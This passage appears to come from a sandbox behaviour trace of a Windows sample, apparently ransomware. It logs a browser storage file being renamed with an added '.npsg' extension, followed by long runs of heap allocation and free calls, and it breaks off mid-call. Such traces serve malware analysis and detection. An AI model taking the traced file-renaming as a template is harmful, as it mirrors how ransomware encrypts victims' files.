(lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0246.243] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0246.243] CloseHandle (hObject=0x644) returned 1 [0246.245] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xe0) returned 0x3b8bce8 [0246.245] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8f0) returned 0x3b8ccd0 [0246.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8bce8 | out: hHeap=0x620000) returned 1 [0246.245] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\www.google[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\3o75jdme\\www.google[1].xml"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\www.google[1].xml.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\3o75jdme\\www.google[1].xml.npsg")) returned 1 [0246.246] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0246.246] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0246.246] VirtualFree (lpAddress=0x39b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0246.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0246.247] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x605dd8a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x605dd8a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x696aec80, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="www.google[1].xml", cAlternateFileName="WWWGOO~1.XML")) returned 0 [0246.247] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0246.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18b0 | out: hHeap=0x620000) returned 1 [0246.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8888 | out: hHeap=0x620000) returned 1 [0246.247] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0246.247] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8888 [0246.247] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0246.247] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.247] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.247] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.248] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.248] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.248] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.248] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.248] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.248] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.248] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.248] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.248] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.248] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0246.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.248] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.248] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.248] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0246.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0246.248] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.248] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.249] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.249] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.249] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.249] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.249] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0246.249] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.249] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.249] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.249] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b8ccd0 [0246.249] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0246.249] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.249] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.249] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b8ccd0 [0246.249] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0246.249] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.249] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.249] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.249] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.249] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.249] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.249] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.249] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.249] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.249] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.249] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0246.249] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.249] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.249] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.250] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0246.250] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.250] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.250] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.250] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.250] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.250] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.250] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.250] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.250] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.250] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.250] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.250] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.250] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.250] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.250] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.250] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.250] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.250] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.250] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.250] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.250] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.250] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.250] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.250] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.250] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.250] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.250] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.251] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.251] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.251] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.251] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.251] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.251] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0246.251] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.251] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0246.251] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.251] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.251] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.251] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.251] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.251] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.251] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.251] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0246.251] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.251] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0246.251] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.251] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.251] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b8ccd0 [0246.251] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0246.251] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.251] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.251] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b8ccd0 [0246.252] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0246.252] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.252] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.252] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.252] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.252] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.252] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.252] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.252] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.252] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.252] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.252] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.252] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0246.252] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.252] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0246.252] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.252] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.252] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0246.252] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.252] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.252] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.252] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0246.252] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.252] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.252] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.252] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.253] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.253] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.253] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.253] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.253] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.253] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.253] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.253] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.253] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.253] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.253] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.253] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.253] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.253] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.253] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.253] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.253] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.253] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.253] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.253] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.253] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.253] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.253] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.253] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.253] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.254] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.254] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.254] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.254] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0246.254] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.254] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0246.254] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.254] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.254] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.254] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.254] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.254] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.254] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b8ccd0 [0246.254] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0246.254] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.254] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.254] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b8ccd0 [0246.254] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0246.254] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.254] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.254] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.254] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.254] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.254] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.254] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.255] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.255] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.255] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.255] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.255] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0246.255] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.255] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0246.255] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.255] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.255] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0246.255] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.255] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.255] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.255] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0246.255] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.255] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.255] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.255] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.255] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.255] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.255] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.255] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.255] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.255] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.255] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.255] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0246.256] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.256] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0246.256] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0246.256] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, 